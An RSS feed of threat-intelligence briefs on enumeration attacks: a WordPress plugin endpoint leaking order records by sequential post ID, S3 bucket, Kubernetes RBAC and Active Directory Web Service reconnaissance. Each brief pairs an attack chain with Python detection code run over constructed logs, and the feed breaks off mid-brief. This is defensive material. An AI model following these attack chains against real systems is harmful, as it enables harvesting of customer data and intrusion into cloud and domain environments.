<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Enumeration — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/enumeration/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Mon, 04 May 2026 18:16:29 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/enumeration/feed.xml" rel="self" type="application/rss+xml"/><item><title>WordPress Easy PayPal Events &amp; Tickets Plugin Information Disclosure Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-05-wordpress-easy-paypal-info-disclosure/</link><pubDate>Mon, 04 May 2026 18:16:29 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-wordpress-easy-paypal-info-disclosure/</guid><description>An information disclosure vulnerability in the Easy PayPal Events &amp; Tickets WordPress plugin (versions 1.3 and earlier) allows unauthenticated attackers to enumerate and retrieve all customer order records via the scan_qr.php endpoint.</description><content:encoded><![CDATA[<p>The Easy PayPal Events &amp; Tickets plugin for WordPress, versions 1.3 and earlier, contains an information disclosure vulnerability (CVE-2026-41471). The <code>scan_qr.php</code> endpoint looks up an order by WordPress post ID without checking that the caller is authenticated or entitled to that order, so an unauthenticated attacker can walk through sequential post IDs and retrieve the customer order records stored in the WordPress database. The plugin was closed on March 18, 2026 rather than patched, so no fixed version exists and any site still running it remains vulnerable. This allows the harvesting of sensitive customer data including names, addresses, and purchase histories.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker identifies a WordPress site using the vulnerable Easy PayPal Events &amp; Tickets plugin (version 1.3 or earlier).</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>scan_qr.php</code> endpoint.</li>
<li>The attacker modifies the request to iterate through sequential WordPress post IDs.</li>
<li>The server processes the request without proper authentication or authorization checks.</li>
<li>The <code>scan_qr.php</code> endpoint queries the WordPress database for order records associated with the provided post ID.</li>
<li>If a valid order record is found, the server returns the information in the HTTP response.</li>
<li>The attacker parses the HTTP response to extract customer order information.</li>
<li>The attacker repeats steps 2-7, incrementing the post ID to enumerate all order records.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows unauthenticated attackers to retrieve every customer order record stored in the WordPress database. This exposes sensitive customer information, including names, email addresses, purchase history, and potentially other personal details. The number of affected victims depends on how widely the vulnerable plugin is installed and how many orders each site holds. If the order records include financial information, the impact could be severe.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule detecting requests to the <code>scan_qr.php</code> endpoint with iterative post IDs to identify potential exploitation attempts.</li>
<li>If still using the Easy PayPal Events &amp; Tickets plugin, remove it: the plugin was closed on 2026-03-18 and will not receive a fix, so there is no version to upgrade to.</li>
<li>Monitor web server access logs for requests to the <code>scan_qr.php</code> endpoint, in particular bursts of requests from a single source IP in which the post ID changes by one each time; treat such a burst from an unfamiliar address as a likely harvesting attempt and review which order records it reached.</li>
</ul>
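<p>As an added illustration (not code from this feed or from the plugin), the following Python detection applies the access-log recommendation above to a few constructed log lines: it groups <code>scan_qr.php</code> requests by client IP, collects the numeric post IDs each client asked for, and flags clients whose IDs form a consecutive run. The plugin directory slug in the sample paths and the <code>id</code> query parameter are assumptions; the brief names only the script, not how the post ID is passed, so set <code>id_param</code> to the real parameter name.</p>

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed access-log lines in Apache/nginx "combined" format (not real traffic).
# The plugin directory slug and the "id" query parameter are assumptions: the
# brief names only the scan_qr.php script, not how the post ID is passed.
SAMPLE_LOG = """\
203.0.113.7 - - [04/May/2026:18:01:01 +0000] "GET /wp-content/plugins/easy-paypal-events-tickets/scan_qr.php?id=101 HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.7 - - [04/May/2026:18:01:01 +0000] "GET /wp-content/plugins/easy-paypal-events-tickets/scan_qr.php?id=102 HTTP/1.1" 200 498 "-" "python-requests/2.31"
203.0.113.7 - - [04/May/2026:18:01:02 +0000] "GET /wp-content/plugins/easy-paypal-events-tickets/scan_qr.php?id=103 HTTP/1.1" 404 0 "-" "python-requests/2.31"
203.0.113.7 - - [04/May/2026:18:01:02 +0000] "GET /wp-content/plugins/easy-paypal-events-tickets/scan_qr.php?id=104 HTTP/1.1" 200 530 "-" "python-requests/2.31"
203.0.113.7 - - [04/May/2026:18:01:03 +0000] "GET /wp-content/plugins/easy-paypal-events-tickets/scan_qr.php?id=105 HTTP/1.1" 200 511 "-" "python-requests/2.31"
198.51.100.9 - - [04/May/2026:18:05:10 +0000] "GET /wp-content/plugins/easy-paypal-events-tickets/scan_qr.php?id=4711 HTTP/1.1" 200 520 "-" "Mozilla/5.0"
198.51.100.9 - - [04/May/2026:18:09:44 +0000] "GET /wp-admin/edit.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request line and status code of a combined-format entry.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_qr_hits(log_text, id_param="id"):
    """Map each client IP to the set of numeric post IDs it requested from scan_qr.php.
    Every status code counts: a 404 for a gap in the ID space is still part of the sweep."""
    ids_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("target"))
        if not url.path.endswith("/scan_qr.php"):
            continue
        for value in parse_qs(url.query).get(id_param, []):
            if value.isdigit():
                ids_by_ip[m.group("ip")].add(int(value))
    return ids_by_ip


def detect_scan_qr_enumeration(log_text, min_ids=5, id_param="id"):
    """Return {ip: sorted ids} for clients that requested at least `min_ids` distinct
    post IDs from scan_qr.php where the IDs form a mostly consecutive run."""
    alerts = {}
    for ip, ids in scan_qr_hits(log_text, id_param).items():
        if len(ids) < min_ids:
            continue
        ordered = sorted(ids)
        consecutive = sum(1 for a, b in zip(ordered, ordered[1:]) if b - a == 1)
        # A sequential sweep of N IDs yields N-1 unit steps; tolerate one gap.
        if consecutive >= len(ordered) - 2:
            alerts[ip] = ordered
    return alerts


if __name__ == "__main__":
    for ip, ids in detect_scan_qr_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: swept {len(ids)} order IDs {ids[0]}..{ids[-1]}")
```

<p>The 404 in the middle of the run is the attacker hitting a post that is not an order, not a sign the request was harmless, which is why every status code is counted. Because the plugin ships no fix, the useful output of this check is not just an alert but the list of which order IDs were exposed to which address, which is what a breach assessment needs.</p>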
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>wordpress</category><category>info-disclosure</category><category>cve-2026-41471</category><category>unauthenticated</category><category>enumeration</category></item><item><title>Rapid Enumeration of AWS S3 Buckets</title><link>https://feed.craftedsignal.io/briefs/2024-01-aws-s3-bucket-discovery/</link><pubDate>Fri, 01 May 2026 19:43:38 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aws-s3-bucket-discovery/</guid><description>An AWS principal rapidly enumerates S3 bucket posture using read-only APIs, indicative of reconnaissance, scanning, or post-compromise activity.</description><content:encoded><![CDATA[<p>This threat brief covers suspicious activity related to the rapid enumeration of AWS S3 buckets. The activity is characterized by an AWS principal invoking read-only S3 control-plane APIs from the same source IP address within a short timeframe. This pattern is often associated with reconnaissance efforts, security scanning tools, or post-compromise enumeration activities. The behavior is similar to that observed with CSPM tools and by threat actors like Team PCP. The detection specifically excludes AWS service principals and requires programmatic-style sessions (i.e., not Management Console credentials). It focuses on scenarios where resource and identity fields are populated to avoid skewed results from null values. The detection threshold is set to greater than 15 distinct <code>aws.cloudtrail.resources.arn</code> values within a 10-second window.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to an AWS environment using compromised credentials or through an exposed IAM role.</li>
<li>The attacker authenticates to AWS with those credentials, creating a programmatic (non-console) session.</li>
<li>The attacker issues a series of <code>GetBucketAcl</code>, <code>GetBucketPublicAccessBlock</code>, <code>GetBucketPolicy</code>, <code>GetBucketPolicyStatus</code>, and <code>GetBucketVersioning</code> API calls to S3.</li>
<li>These calls are spread across many distinct S3 buckets within a short timeframe (in the detection&rsquo;s default tuning, more than 15 buckets inside 10 seconds).</li>
<li>The attacker collects information about each bucket&rsquo;s access control lists (ACLs), public access block settings, policy, versioning status, and other metadata. (T1526, T1580, T1619)</li>
<li>The collected information is analyzed to identify publicly accessible buckets, misconfigurations, or sensitive data storage locations.</li>
<li>The attacker uses the identified misconfigurations to read and exfiltrate bucket contents. (T1530)</li>
<li>The attacker attempts lateral movement within the AWS environment, leveraging the discovered information to compromise other resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful enumeration of S3 buckets can lead to the discovery of sensitive data, misconfigurations, and publicly accessible resources. This can result in data breaches, unauthorized access, and further compromise of the AWS environment. The enumeration allows an attacker to map out the S3 storage landscape, identifying targets for data exfiltration or privilege escalation. The rapid nature of the enumeration suggests automated scanning or reconnaissance, potentially indicating a larger attack campaign.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule from this brief to detect rapid S3 bucket enumeration in AWS CloudTrail logs, adjusting the default threshold of more than 15 distinct buckets in 10 seconds to suit your environment.</li>
<li>Investigate any alerts generated by the Sigma rule, focusing on the source IP address (<code>source.ip</code>), AWS principal ARN (<code>aws.cloudtrail.user_identity.arn</code>), and the list of accessed buckets (<code>aws.cloudtrail.resources.arn</code>).</li>
<li>Review IAM policies associated with the identified principal to ensure least privilege for S3 read APIs.</li>
<li>Monitor CloudTrail logs for related events, such as <code>ListBuckets</code>, <code>GetObject</code>, <code>PutBucketPolicy</code>, <code>AssumeRole</code>, or IAM changes, occurring within ±30 minutes of the detected enumeration activity.</li>
<li>Implement network-level restrictions on the source IP address if it is not authorized to perform S3 enumeration.</li>
<li>Document approved scanning accounts and add user agent filters to the provided Sigma rule to reduce noise from those identities.</li>
</ul>
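<p>The following Python is an added example, not the feed&rsquo;s Sigma rule, showing the detection logic described in the overview run over constructed CloudTrail records. It reads raw CloudTrail field names; the brief&rsquo;s ECS names <code>aws.cloudtrail.user_identity.arn</code>, <code>source.ip</code> and <code>aws.cloudtrail.resources.arn</code> correspond to <code>userIdentity.arn</code>, <code>sourceIPAddress</code> and <code>resources[].ARN</code> here. Console sessions are recognised through CloudTrail&rsquo;s <code>sessionCredentialFromConsole</code> attribute, and the sample includes a slow scan to show that the 10-second window, not just the bucket count, decides the alert.</p>

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# The five read-only S3 control-plane calls the brief lists.
ENUM_ACTIONS = (
    "GetBucketAcl", "GetBucketPublicAccessBlock", "GetBucketPolicy",
    "GetBucketPolicyStatus", "GetBucketVersioning",
)
WINDOW = timedelta(seconds=10)   # from the brief
THRESHOLD = 15                   # "more than 15 distinct bucket ARNs"
TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"  # CloudTrail eventTime format


def is_candidate(ev):
    """Apply the brief's pre-filters: enumeration API, no AWS service principal,
    no console session, and identity/resource fields populated."""
    ident = ev.get("userIdentity") or {}
    if ev.get("eventName") not in ENUM_ACTIONS:
        return False
    if ident.get("type") == "AWSService":
        return False
    if str(ev.get("sessionCredentialFromConsole", "false")).lower() == "true":
        return False
    return bool(ident.get("arn") and ev.get("sourceIPAddress") and ev.get("resources"))


def detect_rapid_s3_enumeration(events, threshold=THRESHOLD, window=WINDOW):
    """Return one alert per (principal ARN, source IP) whose calls touch more than
    `threshold` distinct bucket ARNs inside any sliding `window`."""
    hits = defaultdict(list)  # (arn, ip) -> [(time, bucket_arn)]
    for ev in filter(is_candidate, events):
        key = (ev["userIdentity"]["arn"], ev["sourceIPAddress"])
        when = datetime.strptime(ev["eventTime"], TIME_FMT)
        for res in ev["resources"]:
            if res.get("ARN", "").startswith("arn:aws:s3:::"):
                hits[key].append((when, res["ARN"]))
    alerts = []
    for (arn, ip), calls in hits.items():
        calls.sort()
        recent = deque()
        for when, bucket in calls:
            recent.append((when, bucket))
            while when - recent[0][0] > window:
                recent.popleft()
            distinct = {b for _, b in recent}
            if len(distinct) > threshold:
                alerts.append({"principal": arn, "source_ip": ip,
                               "distinct_buckets": len(distinct),
                               "window_start": recent[0][0].strftime(TIME_FMT)})
                break  # one alert per principal/IP pair is enough for triage
    return alerts


def _event(action, principal, ip, bucket, when, ident_type="IAMUser", console=False):
    """Build a minimal CloudTrail record; only the fields the detection reads are set."""
    ev = {
        "eventTime": when.strftime(TIME_FMT), "eventName": action,
        "eventSource": "s3.amazonaws.com", "sourceIPAddress": ip,
        "userIdentity": {"type": ident_type, "arn": principal},
        "resources": [{"type": "AWS::S3::Bucket", "ARN": f"arn:aws:s3:::{bucket}"}],
    }
    if console:
        ev["sessionCredentialFromConsole"] = "true"
    return ev


def sample_events():
    """Constructed CloudTrail records (not real telemetry) covering five cases."""
    t0 = datetime(2026, 5, 1, 19, 40, 0)
    acct = "arn:aws:iam::111122223333"
    evs = []
    for i in range(20):
        action = ENUM_ACTIONS[i % len(ENUM_ACTIONS)]
        burst = t0 + timedelta(milliseconds=300 * i)   # 20 buckets in about 6 s
        # 1. Scanner with a stolen access key -> alert.
        evs.append(_event(action, f"{acct}:user/compromised-ci", "203.0.113.7",
                          f"corp-data-{i:02d}", burst))
        # 2. Slow scan, one bucket every 10 s -> no window ever holds more than 2.
        evs.append(_event(action, f"{acct}:user/slow-audit", "198.51.100.9",
                          f"corp-data-{i:02d}", t0 + timedelta(seconds=10 * i)))
        # 3. Same burst from an AWS service principal -> excluded by the pre-filter.
        evs.append(_event(action, f"{acct}:role/service", "s3.amazonaws.com",
                          f"corp-data-{i:02d}", burst, ident_type="AWSService"))
        # 4. Same burst from a console session -> excluded by the pre-filter.
        evs.append(_event(action, f"{acct}:user/console-admin", "192.0.2.10",
                          f"corp-data-{i:02d}", burst, console=True))
    # 5. An engineer checking three buckets -> well under the threshold.
    for i in range(3):
        evs.append(_event("GetBucketPolicy", f"{acct}:user/engineer", "192.0.2.11",
                          f"app-{i}", t0 + timedelta(seconds=i)))
    return evs
```

<p>Lowering <code>threshold</code> to 2 makes the three-bucket engineer fire while the slow audit still stays quiet, which is the tuning trade-off the recommendation refers to: the window bounds how fast a legitimate tool may walk the account, and the count bounds how many buckets it may touch at that speed.</p>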
]]></content:encoded><category domain="severity">low</category><category domain="type">advisory</category><category>aws</category><category>s3</category><category>cloudtrail</category><category>discovery</category><category>enumeration</category><category>reconnaissance</category></item><item><title>Kubernetes Endpoint Permission Enumeration</title><link>https://feed.craftedsignal.io/briefs/2024-01-26-kubernetes-enumeration/</link><pubDate>Thu, 05 Mar 2026 13:13:30 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-26-kubernetes-enumeration/</guid><description>A single user and source IP attempts to enumerate Kubernetes endpoints, issuing API requests across multiple endpoints to identify accessible resources for further exploitation.</description><content:encoded><![CDATA[<p>This detection identifies endpoint enumeration attempts within a Kubernetes environment. An attacker, or a compromised account, may map the resources its credentials can reach by issuing a burst of API calls across many endpoints from a single user and source IP address. Both successful and failed requests are part of the pattern: a 403 tells the caller where its RBAC boundary lies just as clearly as a 200 tells it what is in reach. Normal cluster workloads and controllers do not behave this way; they hit a small, stable set of endpoints and rarely accumulate authorization failures. Attackers use this reconnaissance to identify high-value targets like secrets, pods, or nodes before attempting privilege escalation or lateral movement. The rule looks for this pattern in Kubernetes audit logs.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains initial access to the Kubernetes cluster, potentially through compromised credentials or a vulnerable application.</li>
<li>The attacker uses <code>kubectl</code> or a similar tool to send a series of API requests.</li>
<li>The attacker attempts to enumerate Kubernetes API endpoints using &ldquo;get&rdquo;, &ldquo;list&rdquo;, &ldquo;watch&rdquo;, &ldquo;create&rdquo;, &ldquo;update&rdquo;, and &ldquo;patch&rdquo; verbs.</li>
<li>The requests target a variety of resources, including pods, services, deployments, secrets, and nodes.</li>
<li>The attacker analyzes the responses to identify endpoints and resources that are accessible with the current credentials. Successful and failed responses are both valuable for mapping permissions.</li>
<li>The attacker identifies valuable targets, such as secrets or sensitive data stored in configmaps.</li>
<li>The attacker attempts to escalate privileges by exploiting identified vulnerabilities or misconfigurations.</li>
<li>The attacker moves laterally within the cluster to gain access to other resources or workloads.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful enumeration can lead to privilege escalation, lateral movement, and data exfiltration within the Kubernetes cluster. Attackers can identify and compromise sensitive resources such as secrets, configmaps, and pods. The number of affected systems and the scope of the impact depend on the extent of the attacker&rsquo;s access and the sensitivity of the compromised resources.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable Kubernetes audit logging to capture API server requests and responses, which is required for the provided rules and the original Elastic rule.</li>
<li>Deploy the Sigma rules provided below to your SIEM to detect enumeration attempts and tune them based on your environment.</li>
<li>Enforce the principle of least privilege by assigning appropriate RBAC roles to users and service accounts to limit potential enumeration damage.</li>
<li>Monitor Kubernetes audit logs for unusual API request patterns, specifically a high number of requests from a single user and IP address.</li>
<li>Review RBAC bindings for unexpected or overly broad access, especially cluster-wide bindings granted to workload service accounts.</li>
<li>Segment API access with network controls (private endpoint, VPN allowlists) so that a stolen token cannot be used from arbitrary source addresses.</li>
</ul>
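<p>To make the overview and attack-chain steps 3 to 5 concrete, here is an added Python example (not the feed&rsquo;s Sigma rule) that rebuilds, from Kubernetes audit events, the same permission map the attacker is building: per user and source IP, which (verb, resource) pairs returned 2xx and which returned 401/403. A principal that touched many distinct endpoints and collected several denials is flagged, and the alert carries the list of what that principal is actually allowed to do, since that is where triage starts. The audit events are constructed and use the standard <code>audit.k8s.io/v1</code> field names.</p>

```python
from collections import defaultdict

PROBE_VERBS = {"get", "list", "watch", "create", "update", "patch"}


def build_permission_map(events):
    """Group audit events by (username, source IP) and record, per (verb, resource),
    whether the API server allowed (2xx) or denied (401/403) the request.
    Other codes (404, 5xx) say nothing about RBAC and are ignored."""
    perms = defaultdict(dict)
    for ev in events:
        verb = ev.get("verb")
        resource = (ev.get("objectRef") or {}).get("resource")
        code = (ev.get("responseStatus") or {}).get("code", 0)
        source_ip = (ev.get("sourceIPs") or ["unknown"])[0]
        if verb not in PROBE_VERBS or not resource:
            continue
        key = (ev["user"]["username"], source_ip)
        if 200 <= code < 300:
            perms[key][(verb, resource)] = True
        elif code in (401, 403):
            perms[key][(verb, resource)] = False
    return perms


def detect_permission_probing(events, min_endpoints=8, min_denied=3):
    """Flag principals that touched many distinct (verb, resource) endpoints and
    collected several denials. A workload authorized for its job rarely accumulates
    403s; a principal mapping its RBAC boundary always does."""
    alerts = []
    for (user, ip), pmap in build_permission_map(events).items():
        denied = sum(1 for allowed in pmap.values() if not allowed)
        if len(pmap) >= min_endpoints and denied >= min_denied:
            alerts.append({
                "user": user, "source_ip": ip, "endpoints": len(pmap), "denied": denied,
                # What the attacker now knows they can do: the triage starting point.
                "allowed": sorted(vr for vr, ok in pmap.items() if ok),
            })
    return alerts


def _audit(user, ip, verb, resource, code, namespace="default"):
    """Minimal Kubernetes audit event (constructed, not captured from a cluster)."""
    return {"kind": "Event", "apiVersion": "audit.k8s.io/v1", "verb": verb,
            "user": {"username": user}, "sourceIPs": [ip],
            "objectRef": {"resource": resource, "namespace": namespace},
            "responseStatus": {"code": code}}


def sample_audit_events():
    """A service-account token probing ten endpoints, then normal controller noise."""
    sa = "system:serviceaccount:default:web"
    probe = [("list", "pods", 200), ("get", "pods", 200), ("list", "services", 200),
             ("list", "deployments", 200), ("watch", "configmaps", 200),
             ("list", "secrets", 403), ("get", "secrets", 403), ("list", "nodes", 403),
             ("create", "pods", 403), ("patch", "deployments", 403)]
    events = [_audit(sa, "10.0.3.14", v, r, c) for v, r, c in probe]
    # Controller traffic: many requests, but only two endpoints and no denials.
    for _ in range(50):
        events.append(_audit("system:kube-controller-manager", "10.0.0.1", "list", "pods", 200))
        events.append(_audit("system:kube-controller-manager", "10.0.0.1", "watch", "pods", 200))
    return events
```

<p>Counting distinct endpoints rather than raw requests is what keeps the controller quiet: it issues a hundred requests but only ever touches two endpoints and is never denied. Tune <code>min_endpoints</code> and <code>min_denied</code> against a week of your own audit log before relying on the defaults.</p>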
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>kubernetes</category><category>enumeration</category><category>discovery</category></item><item><title>Potential Enumeration via Active Directory Web Service</title><link>https://feed.craftedsignal.io/briefs/2024-01-adws-enumeration/</link><pubDate>Wed, 31 Jan 2024 00:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-adws-enumeration/</guid><description>Adversaries may abuse the Active Directory Web Service (ADWS) to enumerate network resources and user accounts, by loading AD-related modules followed by a network connection to the ADWS dedicated TCP port.</description><content:encoded><![CDATA[<p>The Active Directory Web Service (ADWS) exposes Active Directory (AD) over a SOAP-based web service on TCP port 9389; it is the channel the Active Directory PowerShell module and the Active Directory Administrative Center use instead of LDAP. Adversaries may abuse ADWS to enumerate network resources and user accounts, gaining insights into the environment while sidestepping detections built around direct LDAP queries. This activity involves loading Active Directory related .NET assemblies and then establishing a network connection to the ADWS port. The goal is to gather information about the domain, user accounts, and permissions, which can be used for lateral movement, privilege escalation, and data exfiltration. Detection focuses on identifying suspicious processes loading <code>System.DirectoryServices*.dll</code> or <code>System.IdentityModel*.dll</code> and then connecting to the ADWS port.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to a compromised host within the target network.</li>
<li>The attacker executes a reconnaissance tool or script (e.g., PowerShell) on the compromised host.</li>
<li>The reconnaissance tool loads Active Directory related modules such as <code>System.DirectoryServices*.dll</code> and <code>System.IdentityModel*.dll</code>.</li>
<li>The reconnaissance tool attempts to establish a network connection to the ADWS service on TCP port 9389, the dedicated port for ADWS.</li>
<li>The tool queries ADWS to retrieve information about domain users (T1087.002), groups (T1069.002), systems (T1018), and permissions.</li>
<li>The attacker analyzes the gathered information to identify privileged accounts and potential targets for lateral movement.</li>
<li>The attacker uses the discovered information to move laterally within the network.</li>
<li>The attacker escalates privileges, and exfiltrates sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows attackers to gain detailed knowledge of the Active Directory environment. This information can be used to identify high-value targets, compromise privileged accounts, move laterally within the network, and ultimately achieve their objectives, which could include data theft, ransomware deployment, or disruption of services. The impact can range from data breaches to complete compromise of the Active Directory domain, depending on the attacker&rsquo;s goals and the level of access they achieve.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Potential ADWS Enumeration via Suspicious Library Loading&rdquo; to detect processes loading AD-related DLLs (e.g., <code>System.DirectoryServices*.dll</code>, <code>System.IdentityModel*.dll</code>).</li>
<li>Deploy the Sigma rule &ldquo;Potential ADWS Enumeration via Network Connection&rdquo; to monitor for network connections to destination port 9389 from unusual processes.</li>
<li>Review and whitelist legitimate administrative tools or scripts that load Active Directory-related modules and connect to the ADWS port as described in the &ldquo;False positive analysis&rdquo; section of the original rule documentation.</li>
<li>Implement network segmentation to limit access to the ADWS port (9389) to only trusted systems and users.</li>
</ul>
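<p>The two Sigma rules above fire independently; the sequence the overview describes (module load, then connection to 9389 by the same process) is a correlation. As an added example, not code from the feed, the Python below performs that correlation over constructed endpoint telemetry. It assumes the events are Sysmon records already parsed from XML into dictionaries: event ID 7 (image loaded) and event ID 3 (network connection), joined on <code>ProcessGuid</code>, with the load required to precede the connection within a short window. The sample also includes a process that hits 9389 without loading any AD module and one that loads the module only after connecting, neither of which should correlate.</p>

```python
import fnmatch
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta

AD_MODULE_PATTERNS = ("system.directoryservices*.dll", "system.identitymodel*.dll")
ADWS_PORT = 9389
SYSMON_TIME = "%Y-%m-%d %H:%M:%S.%f"  # Sysmon UtcTime layout


def is_ad_module(image_loaded):
    """Match the DLL basename against the two wildcard patterns from the brief."""
    name = ntpath.basename(image_loaded).lower()
    return any(fnmatch.fnmatchcase(name, pat) for pat in AD_MODULE_PATTERNS)


def correlate_adws(events, max_gap=timedelta(minutes=5), allowlist=frozenset()):
    """Alert when a process that loaded an AD module (Sysmon event 7) later connects
    to TCP 9389 (Sysmon event 3) within `max_gap`. Correlation key is ProcessGuid.
    `allowlist` holds lowercase image basenames of sanctioned admin tooling."""
    loads = defaultdict(list)  # ProcessGuid -> [(load time, dll basename)]
    alerts = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):  # fixed-width, sorts chronologically
        when = datetime.strptime(ev["UtcTime"], SYSMON_TIME)
        if ev["EventID"] == 7 and is_ad_module(ev["ImageLoaded"]):
            loads[ev["ProcessGuid"]].append((when, ntpath.basename(ev["ImageLoaded"])))
        elif ev["EventID"] == 3 and int(ev.get("DestinationPort", 0)) == ADWS_PORT:
            if ntpath.basename(ev["Image"]).lower() in allowlist:
                continue
            recent = sorted({dll for t, dll in loads.get(ev["ProcessGuid"], [])
                             if timedelta(0) <= when - t <= max_gap})
            if recent:
                alerts.append({"host": ev["Computer"], "image": ev["Image"],
                               "process_guid": ev["ProcessGuid"], "user": ev.get("User"),
                               "destination": f'{ev["DestinationIp"]}:{ADWS_PORT}',
                               "modules": recent, "time": ev["UtcTime"]})
    return alerts


def sample_sysmon_events():
    """Constructed Sysmon records (not real telemetry)."""
    ps = "{A1B2C3D4-0001-0000-0000-000000000001}"    # PowerShell: load, then connect
    edge = "{A1B2C3D4-0002-0000-0000-000000000002}"  # browser on 443, irrelevant
    scan = "{A1B2C3D4-0003-0000-0000-000000000003}"  # port scanner, no module load
    late = "{A1B2C3D4-0004-0000-0000-000000000004}"  # connects before loading
    gac = r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL"
    ds_dll = gac + r"\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll"
    im_dll = gac + r"\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll"
    psexe = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    host, dc = "WS-042", "10.0.0.5"
    return [
        {"EventID": 7, "UtcTime": "2024-01-31 09:12:01.100", "Computer": host,
         "ProcessGuid": ps, "Image": psexe, "ImageLoaded": ds_dll},
        {"EventID": 7, "UtcTime": "2024-01-31 09:12:01.300", "Computer": host,
         "ProcessGuid": ps, "Image": psexe, "ImageLoaded": im_dll},
        {"EventID": 3, "UtcTime": "2024-01-31 09:12:03.900", "Computer": host,
         "ProcessGuid": ps, "Image": psexe, "User": "CORP\\jdoe",
         "DestinationIp": dc, "DestinationPort": 9389},
        {"EventID": 3, "UtcTime": "2024-01-31 09:12:05.000", "Computer": host,
         "ProcessGuid": edge, "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
         "User": "CORP\\jdoe", "DestinationIp": "198.51.100.20", "DestinationPort": 443},
        {"EventID": 3, "UtcTime": "2024-01-31 09:13:00.000", "Computer": host,
         "ProcessGuid": scan, "Image": r"C:\Users\jdoe\Downloads\portscan.exe",
         "User": "CORP\\jdoe", "DestinationIp": dc, "DestinationPort": 9389},
        {"EventID": 3, "UtcTime": "2024-01-31 09:14:00.000", "Computer": host,
         "ProcessGuid": late, "Image": psexe, "User": "CORP\\jdoe",
         "DestinationIp": dc, "DestinationPort": 9389},
        {"EventID": 7, "UtcTime": "2024-01-31 09:14:02.000", "Computer": host,
         "ProcessGuid": late, "Image": psexe, "ImageLoaded": ds_dll},
    ]
```

<p>The port scanner is deliberately not caught here: it is exactly the case the second Sigma rule (connection to 9389 from an unusual process) exists for, and running both keeps coverage without forcing the correlation to guess. Populate <code>allowlist</code> from the false-positive analysis the rule documentation describes, for example with the image names of your management hosts&rsquo; AD tooling.</p>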
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>active-directory</category><category>enumeration</category><category>adws</category><category>discovery</category><category>windows</category></item><item><title>Kubernetes Cluster Enumeration via Audit Logs</title><link>https://feed.craftedsignal.io/briefs/2024-01-kubernetes-enumeration/</link><pubDate>Mon, 29 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-kubernetes-enumeration/</guid><description>Attackers attempt to enumerate and discover sensitive information within a Kubernetes cluster by leveraging common shells, utilities, and specialized tools, as reflected in audit logs.</description><content:encoded><![CDATA[<p>Attackers are increasingly targeting Kubernetes environments to gain unauthorized access and extract sensitive information. This activity often begins with enumeration and reconnaissance to map out the cluster&rsquo;s configuration, identify potential vulnerabilities, and locate valuable secrets. This involves the use of standard command-line tools and specialized Kubernetes utilities. Audit logs provide a valuable record of these enumeration attempts, particularly API requests containing shell commands, file transfer utilities, or tools like Rakkess and TruffleHog. This activity is typically aimed at reconnaissance, secret harvesting, or code execution within the cluster. Detecting these patterns in audit logs is critical for identifying and responding to potential breaches.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a system with Kubernetes API access, potentially through compromised credentials or a vulnerable application.</li>
<li>The attacker authenticates to the Kubernetes API server.</li>
<li>The attacker sends a request to the Kubernetes API to execute a shell within a pod, such as <code>/bin/bash</code> or <code>/bin/sh</code>, potentially URL-encoded.</li>
